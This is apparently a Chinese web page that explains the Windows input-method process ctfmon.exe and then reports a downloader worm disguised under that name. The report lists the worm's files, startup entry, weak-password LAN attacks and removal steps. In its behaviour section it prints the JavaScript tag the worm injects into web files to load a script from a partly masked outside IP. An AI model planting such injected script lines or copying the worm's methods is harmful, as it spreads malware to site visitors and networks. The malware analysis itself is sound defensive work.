ctfmon.exe
进程文件: ctfmon 或者 ctfmon.exe
进程名称: Alternative User Input Services
描述:
ctfmon.exe是Microsoft Office产品套装的一部分。它可以选择用户文字输入程序,和微软Office XP语言条。这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。
程序ctfmon.exe是有关输入法的一个可执行程序,系统默认情况下是随电脑开机而自动启动的。如果你设置了ctfmon.exe不随机自动启动,进入系统后你的电脑任务栏中的输入法图标(即语言栏)就不见了。
要设置ctfmon.exe随机自动启动,可以单击“开始”——>“运行”——>输入“msconfig”(引号不要输入),回车——>打开“系统配置使用程序”窗口——>选择“启动”页,找到ctfmon项并在其前面打上钩,按“应用”、“确定”,重启机器即可生效。
如果在“启动”页,找不到ctfmon项,说明注册表中已将该项删除,可以单击“开始”——>“运行”——>输入“regedit”(引号不要输入),回车——>打开“注册表编辑器”,定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,在窗口的右侧新建名字为ctfmon.exe的字符串值(REG_SZ),并将其值设置为“C:\WINDOWS\system32\ctfmon.exe”,然后关闭注册表编辑器,再执行前一步的操作即可.
出品者: Microsoft Corp.
属于: Microsoft Office Suite
系统进程: 是
后台程序: 是
使用网络: 否
硬件相关: 否
常见错误: 未知N/A
常见错误: 未知N/A
安全等级 (0-5): 0
间谍软件: 否
内存大小:3664k
广告软件: 否
病毒: 否
木马: 否
最近电脑突然卡,发现进程了多了很多个ctfmon.exe
感觉不对,马上用在线杀毒http://www.antidu.cn/board/online/ 查杀
金山报毒!!!Win32.Troj.Downloader.c.45056
感染虫下载器45056 Win32.Troj.Downloader.c.45056
病毒行为:
这是一个蠕虫病毒。(蠕虫病毒比以前少了很多,但对局域网的影响会很大)
该病毒运行后,会指定的网络上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接
一旦连接成功,则判断该机器弱口令是否有足够的权限, 有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行.
1.病毒运行后,产生以下病毒文件
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
2.添加病毒启动项
启动项名:svchost对应路径:%Documents and Settings%\Administrator\桌面\ctfmon.exe
3.病毒会触发taimpo.bat病毒文件,用来关闭"360安全卫士",使用户的安全性能降低.
4.病毒会检测连接的远程机器,当远程机器的登录木马是弱口令时,则会对该机器进行攻击,最后下载adi.vbs到用户机器上.
5.遍历磁盘,查找*.htm、*.PHP、*.ASP等网页文件,开始感染,插入一段JS代码:
script language=javascript src=http://218.**.**.248/qq.js
这段脚本病毒,可能会被用作下载更多的木马程序,利用蠕虫攻击传播,利用下载器种植木马,是目前黑客偷东西惯用的手法。
解决方案:
怕麻烦直接去下载专杀工具: http://bbs.antidu.cn/forum-35-1.html
1.删除病毒生成的三个文件,可使用清理专家的文件粉碎器完成操作。
%WINDIR%\ SYSTEM32\tmipo.bat (%WINDIR%缺省是c:\windows目录)
%WINDIR%\ SYSTEM32\taimpo.txt
%Documents and Settings%\Administrator\桌面\ctfmon.exe(伪装成输入法的程序名)
2.使用金山清理专家的修复功能,将病毒添加的注册表启动项删除。
防范措施:
1.最最重要的,是给系统打补丁,登录系统一定要使用口令,就算是电脑只有自己一个人用,也需要安全的登录口令,口令不能太简单,以免被远程攻击工具猜解。(因为只要电脑接入互联网,就能给木马以机会。)
其它方案基本是相通的,不在缀述!
中毒后的解决办法
将杀毒软件升级到最近版本进行查杀,如果查杀完毕后发现输入法无法正常使用的情况,请下载附件中的文件,将其解压后复制到“C:\Windows\system32\” 文件夹即可解决。
